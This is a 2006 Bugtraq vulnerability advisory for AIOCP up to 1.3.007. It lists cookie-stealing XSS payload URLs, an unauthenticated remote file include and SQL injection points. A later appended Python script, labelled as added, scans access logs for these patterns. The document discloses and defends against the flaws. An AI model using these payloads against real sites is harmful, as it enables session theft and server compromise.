Date: 6 Nov 2006 06:37:46 -0000
From: saps.audit@...il.com
To: bugtraq@...urityfocus.com
Subject: AIOCP <=1.3.007 multiples vulnerabilities [sql , remote file
 include , xss]

AIOCP <=1.3.007 multiple vulnerabilities [SQL injection, remote file include, XSS]

XSS get =
- /public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_users_online.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(document.cookie)</script>

xss post in user profile :
- signature
- fiscal code

remote file include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include ) 

sql injection =
- /public/code/cp_dpage.php?choosed_language=[sql]
- /public/code/cp_news.php?choosed_language=[sql]
- /public/code/cp_news.php?news_category=[sql]
- /public/code/cp_forum_view.php?choosed_language=[sql]
- /public/code/cp_edit_user.php?choosed_language=[sql]
- /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
- /public/code/cp_newsletter.php?choosed_language=[sql]
- /public/code/cp_links.php?links_category=[sql]
- /public/code/cp_links.php?choosed_language=[sql]
- /public/code/cp_contact_us.php?choosed_language=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?order_field=[sql]
- /public/code/cp_login.php?choosed_language=[sql]
- /public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
- /public/code/cp_codice_fiscale.php?choosed_language=[sql]
- /public/code/cp_links_search.php?orderdir=[sql]


full path disclosure =
- /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
- /public/code/cp_show_ec_products.php?order_field[]=
- /public/code/cp_show_page_help.php?hp[]=

global risk = high

laurent gaffié & benjamin mossé
http://s-a-p.ca/
saps.audit@...il.com
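
Added example, not part of the original post or of AIOCP: a log triage script that flags requests touching the endpoints and parameters listed in the advisory above. It assumes an Apache-style access log and that legitimate parameter values are plain alphanumeric/underscore tokens; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# Parameter names taken from the advisory, grouped by the issue reported.
INJECTABLE = {"topid", "forid", "catid", "choosed_language", "order_field",
              "orderdir", "news_category", "nlmsg_nlcatid", "links_category",
              "product_category_id", "firstrow"}
ARRAY_PARAMS = {"aiocp_dp[]", "order_field[]", "hp[]"}
# Assumption: legitimate values are short alphanumeric/underscore tokens.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_]*")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return sorted findings for one request URL (path plus query)."""
    path, _, query = url.partition("?")
    if "/code/" not in path:
        return []
    findings = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "load_page" and path.endswith("/admin/code/index.php"):
            # An absolute or scheme-relative URL here matches the include issue.
            if "://" in value or value.startswith("//"):
                findings.add("remote-include")
        elif name in ARRAY_PARAMS:
            findings.add("array-param")  # array syntax behind the path disclosure
        elif name in INJECTABLE and not SAFE_VALUE.fullmatch(value):
            findings.add("unsafe-value:" + name)
    return sorted(findings)

def scan(lines):
    """Return (line_number, findings) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample lines in Apache common log format.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Nov/2006:06:40:01 +0000] "GET /public/code/cp_news.php?choosed_language=eng&news_category=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Nov/2006:06:41:10 +0000] "GET /admin/code/index.php?load_page=http%3A//example.org/x HTTP/1.1" 200 812',
    '203.0.113.9 - - [06/Nov/2006:06:41:12 +0000] "GET /public/code/cp_show_page_help.php?hp[]= HTTP/1.1" 200 301',
    '203.0.113.9 - - [06/Nov/2006:06:41:15 +0000] "GET /public/code/cp_dpage.php?choosed_language=eng%27 HTTP/1.1" 200 977',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

The script only sees query strings, so the stored XSS fields in the user profile (signature, fiscal code) and any POST bodies need a separate check.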
